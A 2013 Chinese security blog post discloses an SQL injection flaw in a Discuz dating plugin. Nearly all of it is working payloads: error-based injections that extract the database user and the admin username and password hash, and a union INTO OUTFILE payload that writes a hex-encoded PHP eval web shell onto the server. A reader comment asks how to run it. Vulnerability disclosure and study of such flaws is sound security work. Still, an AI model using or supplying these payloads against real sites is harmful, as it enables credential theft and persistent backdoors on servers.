Discuz交友插件漏洞附EXP

DZ交友插件漏洞jiaoyou.php?pid=1

有的注入需要登录,注入代码如下:

' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1

爆管理账号密码方法一:

' or @`'` and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(username,0x24,password) as char),0x27,0x7e) FROM pre_common_member LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1

爆管理账号密码方法二:

' or @`'` and(select 1 from(select count(*),concat((select (select concat(username,0x24,password,0x24) from pre_common_member where  uid=1 limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1

root权限写shell:

' or @`'` union select 1,0x3C3F706870206576616C28245F504F53545B635D293F3E,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23  into outfile 'D:\wwwroot\gzcity2\t.php'-- where 1 or @`'` and '1'='1

初学php,写了个简单的exp:

DiscuzSQL Exp

本文固定链接: https://www.unhonker.com/bug/1058.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年04月17日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Discuz交友插件漏洞附EXP | 90' s Blog|关注网络信息安全
关键字:

Discuz交友插件漏洞附EXP:目前有2 条留言

  1. 沙发
    冰封晓风残月:

    90 能不能帮我介绍一下这个怎么用的 为什么我每次用都是提示说这是一个不安全的查询 什么都没有爆出来 求解释 谢谢 有没有教程之类的 发到我的邮箱 谢谢

    2013-05-28 23:01
    • honker90:

      这是4月份的洞了。正常情况下是该出补丁了

      2013-05-29 08:59

发表评论

您必须 [ 登录 ] 才能发表留言!